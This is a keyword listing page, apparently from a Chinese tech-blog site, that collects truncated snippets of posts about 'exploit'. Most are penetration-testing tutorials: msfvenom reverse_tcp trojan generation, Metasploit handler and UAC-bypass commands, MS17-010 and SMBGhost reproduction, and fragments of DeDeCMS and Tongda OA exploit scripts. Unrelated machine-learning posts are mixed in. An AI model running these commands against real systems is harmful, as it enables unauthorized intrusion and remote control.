exploit

msf木马

reverse_tcplhost=本机iplport=本机端口-fexe>文件夹(msfvenom用于生成后门木马的软件,木马可利用社交工程学发送到目标主机)2,输入msfconsole回车然后useexploit
fsociety_h4cker·2020-09-14 06:42

ms16_032系统提权

shikata_ga_nai-i13-b'\x00\xfff\x0a'lhost=10.10.10.128--platformwindowslport=443-fexe>/root/test.exe2.在msf下开启监听useexploit
a439017985·2020-09-14 05:47

Metasploit内网实战篇,NAT环境+bypassUAC内存注入绕过+win7提权

MetasploitPro4.9版本auxiliary/pro/generate_dynamic_stager模块替换了之前的exploit/pro/windows/dynamic_exe增加了动态AV
代码析构师·2020-09-14 05:55

bypass UAC 提权

在meterpreter下getuidsysinfo查看系统版本及相关信息(多少位)backgroundsearchbypassuacuseexploit/windows/local/bypassuac_eventvwr
a439017985·2020-09-14 05:19

WordPress 0day漏洞未授权密码重置CVE-2017-8295 PoC已经开始流传 绿盟科技发布预警通告...

ExploitBox称,wordpress的密码重置功能包含一个漏洞,在某些情况下,攻击者可以在没有以前的身份验证之前获取密码重置链接。
weixin_33725239·2020-09-13 18:40

WordPress all version 0day exploit

http://www.vul.kr/wordpress-all-version-0day-exploit
cnbird2008·2020-09-13 17:53

pwn入门笔记(4)——如何利用printf漏洞突破canary保护

实例分析编译printf2.c,要加canary保护输入写exp,利用printf漏洞来突破canary并且覆盖ret#includevoidexploit(){system("/bin/sh");}voidfunc
balbalba·2020-09-13 14:26

视频超分——14 PFNL(待更新)

ProgressiveFusionVideoSuper-ResolutionNetworkviaExploitingNon-LocalSpatio-TemporalCorrelations参考资料:论文内容
C2H33·2020-09-13 06:47

初探BeEF

就是TheBrowserExploitationFramew
ouyangbro·2020-09-13 04:41

一次迷迷糊糊的靶机渗透Lazsysadmin实战

192.168.85.141kali攻击机:192.168.85.142发现靶机开启了22,80,139,445,3306,6667端口,并且靶机运行着samba服务直接使用msf对samba服务器发起攻击useexploit
FFM-G·2020-09-13 03:02

【强化学习】多臂赌博机问题(MAB)的UCB算法介绍

UCB算法UCB在做EE(Exploit-Explore)的时候表现不错,但是一个不关心组织的上下文无关(contextfree)bandit算法,它只管埋头干活,根本不观察一下面对的都是些什么样的arm
weixin_30293079·2020-09-13 03:22

《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例MS08-067漏洞

如图:接下来,直接指向exploit命令:成功返回s
Donald_Liang·2020-09-13 03:22

Windows提权

2.2工具准备1、在攻击机上安装:python2环境下载xlrd包:pipinstallxlrd2、下载Windows-Exploit:https://github.com/AonCyberLabs/Wi
初学者L_言·2020-09-13 02:35

MSF笔记

share/metasploit-framework/modulesauxiliary用于各种辅助功能比如:信息收集、枚举、指纹探测、扫描encoders编码模块,对payload进行加密evasionexploits
Yl0j8k·2020-09-13 02:59

WiFi漏洞可致数据泄露

根据美国加州大学河滨分校的研究者指出,他们发现了一种路径外TCP漏洞(Off-PathTCPExploit)。借助该漏洞,攻击者可利用TCP和Wi-Fi之间的相互作用,执行W
互联网安全研究院·2020-09-12 15:25

二进制漏洞与利用学习

二进制漏洞与利用学习一、主要术语Binary:由编译类语言生成的可执行程序Vulnerability:Binary中包含的可被利用的BugExploit:借助Vulnerability来劫持Binary
tata_qing·2020-09-12 01:22

深度学习之语义分割-RefineNet

RepeatedsubsamplingoperationslikepoolingorconvolutionstridingindeepCNNsleadtoasignificantdecreaseintheinitialimageresolution.WepresentRefineNet,agenericmulti-pathrefinementnetworkthatexplicitlyexploit
leo_whz·2020-09-11 23:44

深度学习之语义分割-PSPNet

Inthispaper,weexploitthecapabilityofglobalcontextinformationbydifferent-region-basedcontextaggregationthroughoutpyramidpoolingmoduletogetherwiththeproposedpyramidsceneparsingnetwork
leo_whz·2020-09-11 23:44

Exploit & Explore(探索与利用)

Exploit&Explore(探索与利用)举个栗子选餐厅:Exploitation:去最喜欢的餐厅。Exploration:尝试新餐厅。挖石油:Exploitation:继续挖已有的。
大师鲁·2020-09-11 22:48

cobalt strike(cs)和metasploit(msf)联动

一、当cs获取到会话后反弹给msf1、msf上操作useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost192.168.52.208setlport7777exploit-j
La2y·2020-09-11 17:16

劫持SSH会话注入端口转发

mickey·2015/03/1810:390x00前言昨天A牛发群里的链接,其实这种攻击我感觉适合留后门,属于PostExploitation阶段,我以前也没用过这个方法,都是傻呼呼的用个ld_preload
weixin_34015860·2020-09-11 17:47

Shodan搜索引擎介绍

from:http://www.exploit-db.com/wp-content/themes/exploit/docs/33859.pdf0x00概要这篇文章可以作为渗透测试人员和安全工作者运用Shodan
weixin_30413739·2020-09-11 17:00

物联网漏洞挖掘入门--DLINK-DIR-645路由器栈溢出漏洞分析复现

https://www.rapid7.de/db/modules/exploit/linux/http/dlink_hedwig_cgi_bof这个栈溢出的原因是由于cookie的值过长导致的栈溢出。
墨痕诉清风·2020-09-11 16:09

Metasploit 整理笔记

一.名词解释exploit测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit
ling_xiao007·2020-09-11 09:54

ManageEngine Security Manager Plus

http://www.exploit-db.com/exploits/22093/#!
cnbird2008·2020-09-11 08:46

metasploit常用命令

metasploit常用命令serviceapache2startservicepostgresqlstartmsfconsole启动1.MSF终端命令showexploit列出metasploit框架中的所有渗透攻击模块
风欲来花满楼·2020-09-11 07:55

DeDeCMS(织梦)变量覆盖0day getshell

usr/bin/php-w12){echo"[*]ExploitSuccess\n";if($aid==1)echo"[*]Shell:".$url."
weixin_33895016·2020-09-11 04:58

Jenkins RestAPI调用出现Error 403 No valid crumb was included in the request

方法一(不推荐):在jenkins的ConfigureGlobalSecurity下,取消“防止跨站点请求伪造(PreventCrossSiteRequestForgeryexploits)”的勾选方法二
weixin_30367169·2020-09-11 04:36

请及时打补丁 | 80%的漏洞利用公开时间早于CVE编号获得时间

ExploitDatabaseExploitDatabase是最大的公开漏洞利用库。截至目前,ExploitDatabase中有45450个漏洞利用。
systemino·2020-09-10 17:26

谣言数据集链接

使用论文:(1)AStylometricInquiryintoHyperpartisanandFakeNews(2)ExploitingTri-RelationshipforFakeNewsDetectionBuzzFeedNe
heartxq·2020-09-09 14:31

msf如何入侵摄像头

192.168.110.131LPORT=5555-fexex>123.exe生成木马2.将生成的木马复制到外部主机(记得关杀毒软件)3.kali开启监听:msfconsole4.加载攻击模块:useexploit
L无所不能·2020-08-31 18:42

Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR

InallprevioustutorialsinthisExploitwritingtutorialseries,wehavelookedatbuildingexploitsthatwouldworkonWindowsXP
dandandeshui·2020-08-26 23:58

Exploit Development – Stack Overflow

在开始这篇文章之前,先说明一下,网上类似的文章非常多,这里有重造轮子之嫌,之所以写下这些,是希望可以有一个完整的过程,由浅入深。另外,内容与后面写到的参考文章差别并不大,只是额外将自己实践过程中的一些技巧整理出来,方便有兴趣的同学自己尝试。关于栈溢出的历史回顾就不多说了,Google一下,非常多。我们先从一个简单的例子开始:#includeintmain(intargc,char**argv){i
dupei·2020-08-26 23:30

Exploit writing tutorial part 1 Stack Based Overflows

(seehttp://packetstormsecurity.org/0907-exploits
dandandeshui·2020-08-26 23:29

Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode

Inoneofmypreviousposts(part1ofwritingstackbasedbufferoverflowexploits),Ihaveexplainedthebasiscaboutdiscoveringavulnerabilityandusingthatinformationtobuildaworkingexploit.Inthe
dandandeshui·2020-08-26 23:21

Exploit writing tutorial part 8 : Win32 Egg Hunting

sothisisprobablytherighttimetotalkaboutwaystohuntingforeggs(soyouwouldbepreparedwhentheeasterbunnybringsyouanother0dayvulnerability)Inthefirstpartsofthisexploitwriting
dandandeshui·2020-08-26 23:24

Exploit writing tutorial part 3b : SEH Based Exploits – just another example

IhaveindicatedthatSEHneedstobeoverwrittenbyapointerto“poppopret”andthatnextSEHneedstobeoverwrittenwith6bytestojumpoverSEH…Ofcourse,thisstructurewasbasedonthelogicofmostSEHbasedvulnerabilities,andmores
dandandeshui·2020-08-26 23:01

Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc

Finally…afterspendingacoupleofweeksworkingonunicodeandunicodeexploits,I’mgladandhappytobeabletoreleasethisnextarticleinmybasicexploitwritingseries
dandandeshui·2020-08-26 23:01

哭笑不得的科研

操作也很简单,如下:$mkdir/tmp/exploit$ln/bin/ping/tmp/exploit/target$exec
敖木又·2020-08-26 11:08

Linux (x86) Exploit 开发系列教程之十一 Off-By-One 漏洞(基于堆)

Off-By-One漏洞(基于堆)译者:飞龙原文:Off-By-OneVulnerability(HeapBased)预备条件:Off-By-One漏洞(基于栈)理解glibcmallocVM配置:Fedora20(x86)什么是Off-By-One漏洞?在这篇文章中提到过,将源字符串复制到目标缓冲区可能造成Off-By-One漏洞,当源字符串的长度等于目标缓冲区长度的时候。当源字符串的长度等于目
布客飞龙·2020-08-26 08:53

强化学习

我看书的时候就觉得蒙特卡洛树搜索算法和强化学习有着非常紧密的联系,书上提到的exploration和exploitation、蒙特卡洛方法、奖励函数等内容和蒙特卡洛树搜索的基本思想有很多相同的地方。
Road_Son·2020-08-26 08:47

introduction to software exploits off-by-one 一字节溢出

原文链接:introductiontosoftwareexploitsoff-by-one公开课IntroductiontoSoftwareExploits涵盖了简短的基于C语言的off-by-one漏洞
Yuri800·2020-08-26 07:02

ftp服务后门

主机:192.168.136.133靶机:192.168.136.128用nmap扫靶机先对21端口入手,用msf查看该版本漏洞这里利用exploit/unix/ftp/proftpd_133c_backdoor
rlenew·2020-08-25 07:25

利用ms17-010漏洞提权

三、在kali中输入msfconsole(等待一会可能会有点慢)四、进入后输人searchms17-010(搜素攻击模块)五、找到exploitwindo
MzHeader·2020-08-25 07:36

CVE-2020-0796 WIN10 永恒之黑漏洞复现

24扫描网段4.用msfvenom生成python类型的shellcode5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的6.MSF监听4444端口useexploit
干睁·2020-08-25 07:30

电脑主板资料库 10 【转至www.ongood.com.tw】【FreeXploiT收集整理】

MB(主機版)資料第十頁為什麼ASUSP5GPL-TAYZ主機板無法安裝四條雙面的512MB記憶體模組?(取自聯強技術問答)這是因為ASUSP5GPL-TAY主機板採用Intel915PL晶片組,依據Intel網站上所提供的規格表,Intel915PL晶片組雖然可以支援DualChannelMode(雙通道模式),但是每一個Channel只允許一個記憶體插槽的存在,換句話說Intel915PL晶片
freexploit·2020-08-25 07:19

Linux内核提权漏洞发现与利用

漏洞发现针对相应系统版本的cve提权漏洞uname-a所有版本uname-r内核版本信息cat/proc/version内核信息LinuxExploitSuggester下载linux-exploit-suggester.sh
想冲大厂的癞蛤蟆·2020-08-25 06:11

php本地文件包含&远程文件包含

php文件包含函数:include()require()include_once()require_once()本地文件包含:exploit:包含当前目录的lfi.txt(内容为):跨目录包含:http
think_ycx·2020-08-25 04:16

漏洞复现系列--通达OA v11.6版本RCE漏洞(2020hw期间0day)

html2.安装3.exp脚本importrequeststarget="http://ip:port/"//此处填写上面安装oa的ip及端口payload=""print("[*]Warning,ThisexploitcodewillDELETEauth.inc.ph
梦之履行地·2020-08-25 04:48

使用Metasploit入侵windows

msfconsolemsf>searchplatform:windowsxpsp3msf>searchplatform:windows10msf>searchplatform:androidmsf>infoexploit
封无心·2020-08-25 02:28
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他